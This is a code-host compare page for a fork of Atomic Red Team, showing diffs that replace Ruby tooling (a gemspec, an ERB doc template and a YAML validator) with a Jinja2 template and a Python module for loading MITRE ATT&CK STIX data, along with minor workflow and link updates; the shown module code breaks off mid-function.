adam/atomic-red-team-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: adam/atomic-red-team-gs:main
Branches Tags
adam/atomic-red-team-gs:master adam/atomic-red-team-gs:dependabot/pip/typer-0.25.1 adam/atomic-red-team-gs:dependabot/pip/hypothesis-6.152.4 adam/atomic-red-team-gs:remove_ruby adam/atomic-red-team-gs:attack-v19-migration adam/atomic-red-team-gs:dependabot/pip/pydantic-2.13.3 adam/atomic-red-team-gs:main adam/atomic-red-team-gs:fix_attack_nav adam/atomic-red-team-gs:markdown_changes adam/atomic-red-team-gs:external_payloads adam/atomic-red-team-gs:use-basic-parsing adam/atomic-red-team-gs:pre-commit adam/atomic-red-team-gs:python_conversion adam/atomic-red-team-gs:issue_template_fix adam/atomic-red-team-gs:insecure-curl adam/atomic-red-team-gs:T1553.001_fix adam/atomic-red-team-gs:npm_simulate adam/atomic-red-team-gs:remove_bin adam/atomic-red-team-gs:T1016_fix adam/atomic-red-team-gs:cloudlfare-tunnel adam/atomic-red-team-gs:remove_users_launch_daemon adam/atomic-red-team-gs:sysmon_fix adam/atomic-red-team-gs:fix_T1562.001 adam/atomic-red-team-gs:cyberbuff-patch-2 adam/atomic-red-team-gs:yamlfix adam/atomic-red-team-gs:remove-unused-static-dir adam/atomic-red-team-gs:clr2of8-patch-44 adam/atomic-red-team-gs:clr2of8-patch-43 adam/atomic-red-team-gs:clr2of8-patch-35 adam/atomic-red-team-gs:clr2of8-patch-32 adam/atomic-red-team-gs:t1547008 adam/atomic-red-team-gs:atoms adam/atomic-red-team-gs:clr2of8-patch-16 adam/atomic-red-team-gs:clr2of8-patch-14 adam/atomic-red-team-gs:testest adam/atomic-red-team-gs:linpeas_linux adam/atomic-red-team-gs:AutoSUID_linux adam/atomic-red-team-gs:clr2of8-patch-8 adam/atomic-red-team-gs:T1218.005-powershell-without-network-call adam/atomic-red-team-gs:revert-1530-adding_comments_to_navigator adam/atomic-red-team-gs:add_codeowners adam/atomic-red-team-gs:clr2of8-patch-3 adam/atomic-red-team-gs:oscd adam/atomic-red-team-gs:admin-guide adam/atomic-red-team-gs:APT28 adam/atomic-red-team-gs:update-PSDocs adam/atomic-red-team-gs:io-update adam/atomic-red-team-gs:ProcessHolllowingT1093
..
pull from: adam/atomic-red-team-gs:python_conversion
Branches Tags
adam/atomic-red-team-gs:dependabot/pip/typer-0.25.1 adam/atomic-red-team-gs:master adam/atomic-red-team-gs:dependabot/pip/hypothesis-6.152.4 adam/atomic-red-team-gs:remove_ruby adam/atomic-red-team-gs:attack-v19-migration adam/atomic-red-team-gs:dependabot/pip/pydantic-2.13.3 adam/atomic-red-team-gs:main adam/atomic-red-team-gs:fix_attack_nav adam/atomic-red-team-gs:markdown_changes adam/atomic-red-team-gs:external_payloads adam/atomic-red-team-gs:use-basic-parsing adam/atomic-red-team-gs:pre-commit adam/atomic-red-team-gs:python_conversion adam/atomic-red-team-gs:issue_template_fix adam/atomic-red-team-gs:insecure-curl adam/atomic-red-team-gs:T1553.001_fix adam/atomic-red-team-gs:npm_simulate adam/atomic-red-team-gs:remove_bin adam/atomic-red-team-gs:T1016_fix adam/atomic-red-team-gs:cloudlfare-tunnel adam/atomic-red-team-gs:remove_users_launch_daemon adam/atomic-red-team-gs:sysmon_fix adam/atomic-red-team-gs:fix_T1562.001 adam/atomic-red-team-gs:cyberbuff-patch-2 adam/atomic-red-team-gs:yamlfix adam/atomic-red-team-gs:remove-unused-static-dir adam/atomic-red-team-gs:clr2of8-patch-44 adam/atomic-red-team-gs:clr2of8-patch-43 adam/atomic-red-team-gs:clr2of8-patch-35 adam/atomic-red-team-gs:clr2of8-patch-32 adam/atomic-red-team-gs:t1547008 adam/atomic-red-team-gs:atoms adam/atomic-red-team-gs:clr2of8-patch-16 adam/atomic-red-team-gs:clr2of8-patch-14 adam/atomic-red-team-gs:testest adam/atomic-red-team-gs:linpeas_linux adam/atomic-red-team-gs:AutoSUID_linux adam/atomic-red-team-gs:clr2of8-patch-8 adam/atomic-red-team-gs:T1218.005-powershell-without-network-call adam/atomic-red-team-gs:revert-1530-adding_comments_to_navigator adam/atomic-red-team-gs:add_codeowners adam/atomic-red-team-gs:clr2of8-patch-3 adam/atomic-red-team-gs:oscd adam/atomic-red-team-gs:admin-guide adam/atomic-red-team-gs:APT28 adam/atomic-red-team-gs:update-PSDocs adam/atomic-red-team-gs:io-update adam/atomic-red-team-gs:ProcessHolllowingT1093

2 Commits
main .. python_conversion

Author SHA1 Message Date
Hare Sudhan d548576cce python conversion 2025-11-26 00:05:35 -05:00
Hare Sudhan 1be2e57e52 python conversion 2025-11-25 23:32:49 -05:00
425 changed files with 41603 additions and 28910 deletions
Expand all files Collapse all files
.github/workflows/assign-labels.yml
+2 -2
View File
@@ -11,7 +11,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: download-artifact
uses: actions/github-script@v9
uses: actions/github-script@v8
with:
script: |
let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
@@ -35,7 +35,7 @@ jobs:
run: unzip labels.zip
- name: assign-labels-and-reviewers
uses: actions/github-script@v9
uses: actions/github-script@v8
with:
script: |
let fs = require('fs');
.github/workflows/validate-atomics.yml
+2 -2
View File
@@ -42,7 +42,7 @@ jobs:
with:
python-version: "3.11.2"
cache: "poetry"
- uses: actions/github-script@v9
- uses: actions/github-script@v8
id: get_pr_number
with:
script: |
@@ -69,7 +69,7 @@ jobs:
env:
PYTHONPATH: ${{ github.workspace }}
- uses: actions/upload-artifact@v7
- uses: actions/upload-artifact@v5
with:
name: labels.json
path: atomic_red_team/pr/
.github/workflows/validate-terraform.yml
+1 -1
View File
@@ -12,7 +12,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v6
- uses: hashicorp/setup-terraform@v4
- uses: hashicorp/setup-terraform@v3
- name: Terraform fmt
id: fmt
CODE_OF_CONDUCT.md
+2 -2
View File
@@ -29,7 +29,7 @@ If you see anything that you believe breaks our community guidelines, no matter
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the Community Manager. Unacceptable behavior will not be tolerated by community members, maintainers, and Red Canary team members. The Atomic Red Team Community Manager and maintainers will review and investigate all complaints.
Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://atomicredteam.io/slack)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://slack.atomicredteam.io/)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
Atomic Red Team maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
@@ -45,7 +45,7 @@ This Code of Conduct applies to all of the Atomic Red Team, and “Atomic Family
* [Atomic Red Team Website](https://atomicredteam.io/)
* [Atomic Red Team Slack](https://atomicredteam.io/slack)
* [Atomic Red Team Slack](https://slack.atomicredteam.io/)
* [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team)
Gemfile
-2
View File
@@ -1,2 +0,0 @@
source "https://rubygems.org"
gemspec
README.md
+2 -2
View File
@@ -2,7 +2,7 @@
# Atomic Red Team
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1790-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1750-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team™ is a library of tests mapped to the
@@ -32,7 +32,7 @@ To stay up to date on all things Atomic Red Team, sign up for the Atomic Newslet
Atomic Red Team is open source and community developed. If you're interested in
becoming a contributor, check out these resources:
- Join our [Slack workspace](https://atomicredteam.io/slack) and get involved
- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved
with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
before you join.
- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
atomic-red-team.gemspec
-15
View File
@@ -1,15 +0,0 @@
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = 'atomic-red-team'
s.version = '1.0'
s.authors = ['Red Canary', 'Casey Smith', 'Mike Haag']
s.email = ['it@redcanary.com', 'opensource@redcanary.com']
s.summary = 'Small, highly portable, community developed detection tests mapped to ATT&CK.'
s.license = "MIT"
s.homepage = "https://redcanary.com/atomic-red-team"
s.files = %w(atomic-red-team.gemspec) + Dir['{atomic_red_team}/**/*', '*.md', 'bin/*']
s.test_files = Dir['spec/**/*']
s.require_paths = %w(atomic_red_team)
s.add_development_dependency 'github-pages'
end
atomic_red_team/atomic_doc_template.md.erb
-91
View File
@@ -1,91 +0,0 @@
# <%= technique['identifier'] %> - <%= technique['name'] %>
## Description from ATT&CK
<% attack_description_lines = technique['description'].gsub("%\\<", "%<").gsub(/<code>.*?<\/code>/) { |match| match.gsub('~', '\~') } %>
<% attack_description_lines.lines.each do |desc_line| %>> <%= desc_line.strip %>
<% end %>
[Source](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
## Atomic Tests
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
<% title = "Atomic Test ##{test_number+1}: #{test['name']}" %>- [<%= title %>](#<%= title.downcase.gsub(/ /, '-').gsub(/[`~!@#$%^&*()+=<>?,.\/:;"'|{}\[\]\\–—]/, '') %>)
<% end %>
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
### Atomic Test #<%= test_number+1 %>: <%= test['name'] %>
<%= test['description'].strip %>
**Supported Platforms:** <%= test['supported_platforms'].collect do |p|
case p
when 'macos'
'macOS'
else
p.capitalize
end
end.join(', ') %>
**auto_generated_guid:** `<%= test['auto_generated_guid'] %>`
<%def cleanup(input)
input.to_s.strip.gsub(/\\/,"&#92;")
end -%>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
<% end -%>
<% end -%>
<%- if test['executor']['name'] == 'manual' -%>
#### Attack Commands: Run it with these steps! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
<%= test['executor']['steps'] %>
<%- else -%>
#### Attack Commands: Run with `<%= test['executor']['name'] %>`!<%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin)<%- end -%>
<%def get_language(executor)
language = executor
if executor == "command_prompt"
language = "cmd"
elsif executor == "manual"
language = ""
end
language
end%>
```<%= get_language(test['executor']['name']) %>
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<%- if test['executor']['cleanup_command'] != nil -%>
#### Cleanup Commands
```<%= get_language(test['executor']['name']) %>
<%= test['executor']['cleanup_command'].to_s.strip %>
```
<% end -%>
<% if test['dependencies'].to_a.count > 0 -%>
<% dependency_executor = test['executor']['name'] -%>
#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
<% test['dependencies'].each do | dep | -%>
##### Description: <%= dep['description'].strip %>
###### Check Prereq Commands
```<%= get_language(dependency_executor) %>
<%= dep['prereq_command'].strip %>
```
###### Get Prereq Commands
```<%= get_language(dependency_executor) %>
<%= dep['get_prereq_command'].strip %>
```
<% end %>
<% end -%>
<%- end -%>
atomic_red_team/atomic_doc_template.md.j2
+85
View File
@@ -0,0 +1,85 @@
# {{ technique['identifier'] }} - {{ technique['name'] }}
## [Description from ATT&CK](https://attack.mitre.org/techniques/{{ technique['identifier'].replace('.', '/') }})
<blockquote>
{{ technique['description'].replace("%\\<", "%<") }}
</blockquote>
## Atomic Tests
{% for test in atomic_yaml['atomic_tests'] -%}
{% set title = "Atomic Test #" ~ (loop.index) ~ " - " ~ test['name'] -%}
- [{{ title }}](#{{ title | slugify }})
{% endfor %}
{% for test in atomic_yaml['atomic_tests'] -%}
<br/>
## Atomic Test #{{ loop.index }} - {{ test['name'] }}
{{ test['description'].strip() }}
**Supported Platforms:** {{ test['supported_platforms'] | map('platform_display') | join(', ') }}
**auto_generated_guid:** {{ test['auto_generated_guid'] }}
{% if test.get('input_arguments') and test['input_arguments'] | length > 0 %}
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
{% for arg_name, arg_options in test['input_arguments'].items() -%}
| {{ arg_name | cleanup }} | {{ arg_options['description'] | cleanup }} | {{ arg_options['type'] | cleanup }} | {{ arg_options.get('default', '') | cleanup }}|
{% endfor %}
{% endif %}
{%- if test['executor']['name'] == 'manual' %}
#### Run it with these steps! {% if test['executor'].get('elevation_required') %} Elevation Required (e.g. root or admin) {% endif %}
{{ test['executor']['steps'] }}
{% else %}
#### Attack Commands: Run with `{{ test['executor']['name'] }}`! {% if test['executor'].get('elevation_required') %} Elevation Required (e.g. root or admin) {% endif %}
```{{ test['executor']['name'] | get_language }}
{{ test['executor']['command'].strip() }}
```
{% if test['executor'].get('cleanup_command') %}
#### Cleanup Commands:
```{{ test['executor']['name'] | get_language }}
{{ test['executor']['cleanup_command'].strip() }}
```
{% endif %}
{% endif %}
{% if test.get('dependencies') and test['dependencies'] | length > 0 -%}
#### Dependencies: Run with `{{ test.get('dependency_executor_name') or test['executor']['name'] }}`!
{% for dep in test['dependencies'] -%}
##### Description: {{ dep['description'].strip() }}
##### Check Prereq Commands:
```{{ (test.get('dependency_executor_name') or test['executor']['name']) | get_language }}
{{ dep['prereq_command'].strip() }}
```
##### Get Prereq Commands:
```{{ (test.get('dependency_executor_name') or test['executor']['name']) | get_language }}
{{ dep['get_prereq_command'].strip() }}
```
{% endfor %}
{% endif %}
<br/>
{% endfor -%}
atomic_red_team/atomic_execution_template.html.erb
-1
View File
@@ -1 +0,0 @@
TBD
atomic_red_team/atomic_red_team.rb
-271
View File
@@ -1,271 +0,0 @@
require 'yaml'
require 'erb'
require 'attack_api'
require 'securerandom'
class AtomicRedTeam
ATTACK_API = Attack.new
ATOMICS_DIRECTORY = "#{File.dirname(File.dirname(__FILE__))}/atomics"
# TODO- should these all be relative URLs?
ROOT_GITHUB_URL = "https://github.com/redcanaryco/atomic-red-team"
#
# Returns a list of paths that contain Atomic Tests
#
def atomic_test_paths
Dir["#{ATOMICS_DIRECTORY}/T*/T*.yaml"].sort
end
#
# Returns a list of Atomic Tests in Atomic Red Team (as Hashes from source YAML)
#
def atomic_tests
@atomic_tests ||= atomic_test_paths.collect do |path|
atomic_yaml = YAML.load(File.read path)
atomic_yaml['atomic_yaml_path'] = path
atomic_yaml
end
end
#
# Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
#
def atomic_tests_for_technique_by_platform(technique_or_technique_identifier, platform)
technique_identifier = if technique_or_technique_identifier.is_a? Hash
ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier
else
technique_or_technique_identifier
end
test_list = Array.new
atomic_tests.find do |atomic_yaml|
if atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase
atomic_yaml['atomic_tests'].each do |a_test|
if a_test["supported_platforms"].include?(platform[:platform])
test_list.append(a_test)
end
end
end
end
test_list
end
#
# Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
#
def atomic_tests_for_technique(technique_or_technique_identifier)
technique_identifier = if technique_or_technique_identifier.is_a? Hash
ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier
else
technique_or_technique_identifier
end
atomic_tests.find do |atomic_yaml|
atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase
end.to_h.fetch('atomic_tests', [])
end
#
# Returns a Markdown formatted Github link to a technique. This will be to the edit page for
# techniques that already have one or more Atomic Red Team tests, or the create page for
# techniques that have no existing tests for the given OS.
#
def github_link_to_technique(technique, include_identifier: false, only_platform: self.only_platform)
technique_identifier = ATTACK_API.technique_identifier_for_technique(technique).upcase
link_display = "#{"#{technique_identifier.upcase} " if include_identifier}#{technique['name']}"
yaml_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.yaml"
markdown_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
if atomic_yaml_has_test_for_platform(yaml_file, only_platform) && (File.exist? markdown_file)
# we have a file for this technique, so link to it's Markdown file
"[#{link_display}](../../#{technique_identifier}/#{technique_identifier}.md)"
else
# we don't have a file for this technique, or there are not tests for the given platform, so link to an edit page
"#{link_display} [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
end
end
def atomic_yaml_has_test_for_platform(yaml_file, only_platform)
has_test_for_platform = false
if File.exist? yaml_file
yaml = YAML.load_file(yaml_file)
yaml['atomic_tests'].each_with_index do |atomic, i|
if atomic["supported_platforms"].any? {|platform| platform.downcase =~ only_platform}
has_test_for_platform = true
break
end
end
end
return has_test_for_platform
end
def validate_atomic_yaml!(yaml, used_guids_file, unique_guid_array)
raise("YAML file has no elements") if yaml.nil?
raise('`attack_technique` element is required') unless yaml.has_key?('attack_technique')
raise('`attack_technique` element must be a string') unless yaml['attack_technique'].is_a?(String)
raise('`display_name` element is required') unless yaml.has_key?('display_name')
raise('`display_name` element must be an array') unless yaml['display_name'].is_a?(String)
raise('`atomic_tests` element is required') unless yaml.has_key?('atomic_tests')
raise('`atomic_tests` element must be an array') unless yaml['atomic_tests'].is_a?(Array)
raise('`atomic_tests` element is empty - you have no tests') unless yaml['atomic_tests'].count > 0
yaml['atomic_tests'].each_with_index do |atomic, i|
raise("`atomic_tests[#{i}].name` element is required") unless atomic.has_key?('name')
raise("`atomic_tests[#{i}].name` element must be a string") unless atomic['name'].is_a?(String)
if atomic.has_key?('auto_generated_guid')
guid = atomic["auto_generated_guid"].to_s
raise("`atomic_tests[#{i}].auto_generated_guid` element not a proper guid") unless /[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}/.match(guid)
raise("`atomic_tests[#{i}].auto_generated_guid` element must be unique") unless !unique_guid_array.include?(guid)
unique_guid_array << guid
end
raise("`atomic_tests[#{i}].description` element is required") unless atomic.has_key?('description')
raise("`atomic_tests[#{i}].description` element must be a string") unless atomic['description'].is_a?(String)
raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
valid_supported_platforms = ['windows', 'macos', 'linux', 'office-365', 'azure-ad', 'google-workspace', 'saas', 'iaas', 'containers', 'iaas:aws', 'iaas:azure', 'iaas:gcp']
atomic['supported_platforms'].each do |platform|
if !valid_supported_platforms.include?(platform)
raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
end
end
if atomic['dependencies']
atomic['dependencies'].each do |dependency|
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a description}") unless dependency.has_key?('description')
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a prereq_command}") unless dependency.has_key?('prereq_command')
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a get_prereq_command}") unless dependency.has_key?('get_prereq_command')
end
end
(atomic['input_arguments'] || {}).each_with_index do |arg_kvp, iai|
arg_name, arg = arg_kvp
raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element is required") unless arg.has_key?('description')
raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element must be a string") unless arg['description'].is_a?(String)
raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element is required") unless arg.has_key?('type')
raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be a string") unless arg['type'].is_a?(String)
raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be lowercased and underscored (was #{arg['type']})") unless arg['type'] =~ /[a-z_]+/
# TODO: determine if we think default values are required for EVERY input argument
# raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element is required") unless arg.has_key?('default')
# raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element must be a string (was a #{arg['default'].class.name})") unless arg['default'].is_a?(String)
end
raise("`atomic_tests[#{i}].executor` element is required") unless atomic.has_key?('executor')
executor = atomic['executor']
raise("`atomic_tests[#{i}].executor.name` element is required") unless executor.has_key?('name')
raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
case executor['name']
when 'manual'
raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
raise("`atomic_tests[#{i}].executor.steps` element must be a string") unless executor['steps'].is_a?(String)
validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
string: executor['steps'],
string_description: "atomic_tests[#{i}].executor.steps"
when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
string: executor['command'],
string_description: "atomic_tests[#{i}].executor.command"
else
raise("`atomic_tests[#{i}].executor.name` '#{executor['name']}' must be one of #{valid_executor_types.join(', ')}")
end
validate_no_todos!(atomic, path: "atomic_tests[#{i}]")
end
end
def record_used_guids!(yaml, used_guids_file)
return unless !yaml.nil?
yaml['atomic_tests'].each_with_index do |atomic, i|
next unless atomic.has_key?('auto_generated_guid')
guid = atomic["auto_generated_guid"].to_s
add_guid_to_used_guid_file(guid, used_guids_file) unless guid == ''
end
end
def generate_guids_for_yaml!(path, used_guids_file)
text = File.read(path)
# add the "auto_generated_guid:" element after the "- name:" element if it isn't already there
text.gsub!(/(?i)(^([ \t]*-[ \t]*)name:.*$(?!\s*auto_generated_guid))/) { |m| "#{$1}\n#{$2.gsub(/-/," ")}auto_generated_guid:"}
# fill the "auto_generated_guid:" element in if it doesn't contain a guid
text.gsub!(/(?i)^([ \t]*auto_generated_guid:)(?!([ \t]*[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12})).*$/) { |m| "#{$1} #{get_unique_guid!(used_guids_file)}"}
File.open(path, "w") { |file| file << text }
end
# generates a unique guid and records the guid as having been used by writing it to the used_guids_file
def get_unique_guid!(used_guids_file)
new_guid = ''
20.times do |i| # if it takes more than 20 tries to get a unique guid, there must be something else going on
new_guid = SecureRandom.uuid
break unless !is_unique_guid(new_guid, used_guids_file)
end
# add this new unique guid to the used guids file
add_guid_to_used_guid_file(new_guid, used_guids_file)
return new_guid
end
# add guid to used guid file if it is the proper format and is not already in the file. raises an exception if guid isn't valid
def add_guid_to_used_guid_file(guid, used_guids_file)
open(used_guids_file, 'a') { |f|
raise("the GUID (#{guid}) does not match the required format for the `auto_generated_guid` element") unless /[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}/ =~ guid
f.puts guid unless !is_unique_guid(guid, used_guids_file)
}
end
def is_unique_guid(guid, used_guids_file)
return !File.foreach(used_guids_file).grep(/#{guid}/).any?
end
#
# Validates that the arguments (specified in "#{arg}" format) in a string
# match the input_arguments for a test
#
def validate_input_args_vs_string!(input_args:, string:, string_description:)
input_args_in_string = string.scan(/#\{([^}]+)\}/).to_a.flatten
input_args_in_string_and_not_specced = input_args_in_string - input_args
if input_args_in_string_and_not_specced.count > 0
raise("`#{string_description}` contains args #{input_args_in_string_and_not_specced} not in input_arguments")
end
input_args_in_spec_not_string = input_args - input_args_in_string
if input_args_in_string_and_not_specced.count > 0
raise("`atomic_tests[#{i}].input_arguments` contains args #{input_args_in_spec_not_string} not in command")
end
end
#
# Recursively validates that the hash (or something) doesn't contain a TODO
#
def validate_no_todos!(hashish, path:)
if hashish.is_a? String
raise "`#{path}` contains a TODO" if hashish.include? 'TODO'
elsif hashish.is_a? Array
hashish.each_with_index do |item, i|
validate_no_todos! item, path: "#{path}[#{i}]"
end
elsif hashish.is_a? Hash
hashish.each do |k, v|
validate_no_todos! v, path: "#{path}.#{k}"
end
end
end
end
atomic_red_team/attack_api.py
+238
View File
@@ -0,0 +1,238 @@
"""
Attack API module for loading and querying MITRE ATT&CK technique data.
This module provides the Attack class that loads information about ATT&CK techniques
from MITRE's ATT&CK STIX representation using the mitreattack-python library.
"""
import json
import re
from pathlib import Path
from typing import Dict, List, Optional, Pattern
# Tactics in the order that the ATT&CK matrix uses
ORDERED_TACTICS = [
"initial-access",
"execution",
"persistence",
"privilege-escalation",
"defense-evasion",
"credential-access",
"discovery",
"lateral-movement",
"collection",
"exfiltration",
"command-and-control",
"impact",
]
class Attack:
"""
API class that loads information about ATT&CK techniques from MITRE's ATT&CK
STIX representation. Optimized for speed with caching.
"""
def __init__(self, stix_file: Optional[str] = None):
"""
Initialize the Attack API.
Args:
stix_file: Optional path to a local STIX JSON file.
Defaults to enterprise-attack.json in the same directory.
"""
if stix_file is None:
stix_file = str(Path(__file__).parent / "enterprise-attack.json")
self._stix_file = stix_file
self._techniques: Optional[List[dict]] = None
self._technique_by_id: Optional[Dict[str, dict]] = None
self._attack_stix: Optional[dict] = None
def _load_stix(self) -> dict:
"""Load and cache the STIX JSON data."""
if self._attack_stix is None:
with open(self._stix_file, "r", encoding="utf-8") as f:
self._attack_stix = json.load(f)
return self._attack_stix
@property
def ordered_tactics(self) -> List[str]:
"""Returns tactics in the order that the ATT&CK matrix uses."""
return ORDERED_TACTICS
def technique_identifier_for_technique(self, technique: dict) -> str:
"""
Returns the technique identifier (e.g., T1234) for a Technique object.
Args:
technique: A technique dictionary from the STIX data.
Returns:
The technique ID (e.g., "T1234" or "T1234.001").
"""
external_refs = technique.get("external_references", [])
for ref in external_refs:
if ref.get("source_name") == "mitre-attack":
return ref.get("external_id", "").upper()
return ""
def _build_technique_index(self) -> Dict[str, dict]:
"""Build an index of technique_id -> technique for fast lookups."""
if self._technique_by_id is None:
self._technique_by_id = {}
for technique in self.techniques:
tech_id = self.technique_identifier_for_technique(technique)
if tech_id:
self._technique_by_id[tech_id] = technique
return self._technique_by_id
def technique_info(self, technique_id: str) -> Optional[dict]:
"""
Returns a Technique object given a technique identifier (T1234).
Args:
technique_id: The technique ID (e.g., "T1234").
Returns:
The technique dictionary or None if not found.
"""
index = self._build_technique_index()
return index.get(technique_id.upper())
def ordered_tactic_to_technique_matrix(
self, only_platform: Pattern = re.compile(r".*")
) -> List[List[Optional[dict]]]:
"""
Returns the ATT&CK Matrix as a 2D array, in order by ordered_tactics.
Args:
only_platform: Regex pattern to filter techniques by platform.
Returns:
2D list of techniques organized by tactic columns.
"""
all_techniques = self.techniques_by_tactic(only_platform=only_platform)
# Make a 2D array of techniques in the order our tactics appear
all_techniques_in_tactic_order = []
for tactic in self.ordered_tactics:
all_techniques_in_tactic_order.append(all_techniques.get(tactic, []))
# Figure out the max number of techniques any one tactic has
max_techniques = (
max(len(techs) for techs in all_techniques_in_tactic_order)
if all_techniques_in_tactic_order
else 0
)
if max_techniques == 0:
return []
# Extend each array of techniques to that length
for techniques in all_techniques_in_tactic_order:
techniques.extend([None] * (max_techniques - len(techniques)))
# Transpose to give us the data in columnar format
return list(map(list, zip(*all_techniques_in_tactic_order)))
def techniques_by_tactic(
self, only_platform: Pattern = re.compile(r".*")
) -> Dict[str, List[dict]]:
"""
Returns a map of all [ATT&CK Tactic name] => [List of ATT&CK techniques].
Args:
only_platform: Regex pattern to filter techniques by platform.
Returns:
Dictionary mapping tactic names to lists of techniques.
"""
techniques_by_tactic: Dict[str, List[dict]] = {}
for technique in self.techniques:
platforms = technique.get("x_mitre_platforms")
if platforms is None:
continue
# Check if any platform matches
platform_match = any(
only_platform.match(p.lower().replace(" ", "-")) for p in platforms
)
if not platform_match:
continue
# Skip revoked or deprecated techniques
if technique.get("revoked", False):
continue
if technique.get("x_mitre_deprecated", False):
continue
# Add to each tactic this technique belongs to
kill_chain_phases = technique.get("kill_chain_phases", [])
for phase in kill_chain_phases:
if phase.get("kill_chain_name") == "mitre-attack":
tactic_name = phase.get("phase_name")
if tactic_name:
if tactic_name not in techniques_by_tactic:
techniques_by_tactic[tactic_name] = []
techniques_by_tactic[tactic_name].append(technique)
return techniques_by_tactic
@property
def techniques(self) -> List[dict]:
"""
Returns a list of all ATT&CK techniques.
Returns:
List of technique dictionaries.
"""
if self._techniques is not None:
return self._techniques
stix_data = self._load_stix()
self._techniques = []
for item in stix_data.get("objects", []):
if item.get("type") != "attack-pattern":
continue
# Check if it has mitre-attack external reference
